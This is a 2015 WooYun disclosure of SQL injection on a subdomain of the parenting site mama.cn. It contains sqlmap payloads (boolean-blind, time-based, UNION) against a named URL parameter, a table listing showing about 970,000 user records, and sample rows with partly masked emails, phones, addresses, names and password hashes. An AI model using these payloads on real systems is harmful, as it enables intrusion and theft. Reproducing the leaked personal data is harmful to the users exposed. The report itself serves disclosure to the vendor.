当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108536

漏洞标题:妈妈网某站SQL注射泄露近100万详细用户信息数据

相关厂商:妈妈网

漏洞作者: 路人甲

提交时间:2015-04-17 10:31

修复时间:2015-06-01 14:06

公开时间:2015-06-01 14:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-17: 细节已通知厂商并且等待厂商处理中
2015-04-17: 厂商已经确认,细节仅向厂商公开
2015-04-27: 细节向核心白帽子及相关领域专家公开
2015-05-07: 细节向普通白帽子公开
2015-05-17: 细节向实习白帽子公开
2015-06-01: 细节向公众公开

简要描述:

233

详细说明:

http://try.mama.cn/do_ajax.php?area_id=2&do=area
参数id
12-2*5+0+0+1-1 返回 TRUE
12-2*6+0+0+1-1 返回 FALSE
2 AND 2+1-1-1=1 AND 380=380 返回 TRUE
2 AND 3+1-1-1=1 AND 380=380 返回 FALSE
可知,漏洞存在

漏洞证明:

---
Parameter: area_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: area_id=2 AND 9680=9680&do=area
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: area_id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))LJBO)&do=area
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: area_id=2 UNION ALL SELECT CONCAT(0x7176626a71,0x7050487357756666456b,0x717a706b71),NULL,NULL,NULL-- &do=area
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0.12
Database: try
[49 tables]
+-----------------------+
| spe_admin             |   3个管理员账户
| syw_activity          |
。。。。。。
Database: try
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| syw_apply             | 1348949 |
| syw_optionvars        | 995365  |
| syw_user              | 974296  |     97万
Table: syw_user
[10 entries]
+-----+---------+------------+-------------+-------------+------------------------+-------------+---------+---------+---------+---------+--------------------+---------+----------+----------------------------------+----------+----------+---------------+----------+------------+------------+-----------+------------+------------+-------------+-------------+
| id  | city_id | discuz_uid | province_id | district_id | email                  | phone       | handle  | from    | zipcode | updates | address            | credits | baby_sex | password                         | is_start | is_daren | username      | realname | add_time   | lastvisit  | baby_name | baby_birth | babystatus | active_time | update_time |
+-----+---------+------------+-------------+-------------+------------------------+-------------+---------+---------+---------+---------+--------------------+---------+----------+----------------------------------+----------+----------+---------------+----------+------------+------------+-----------+------------+------------+-------------+-------------+
| 401 | 455     | 5430025    | 20          | 0           | 3424**216@qq.com       | 13802***81 | <blank> | <blank> | 510160  | 0       | 荔湾区**1B708 | 50      | 0        | e10adc3949ba***6e057f20f883e | 1        | 0        | lad**410216 | 钟**      | 0          | 1312902368 | <blank>   | 0000-00-00 | 0          | 0           | 0           |
| 400 | 455     | 5189049    | 20          | 0           | 5885**@qq.com        | 137***815 | <blank> | <blank> | 501000  | 0       | 荔湾区石路**     | 75      | 2        | e10adc3949b**e057f20f883e | 1        | 0        | 懒懒公主          | 周**      | 0          | 13073***05 | 龚**        | 2009-12-01 | 0          | 0           | 0           |
用户 姓名,电话,家庭住址,账号密码。。。。

修复方案:

这信息要是泄露出去,诈骗事件又会有更多了。还会对用户产生更大的伤害。
希望厂商重视。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-17 14:05

厂商回复:

谢谢

最新状态:

暂无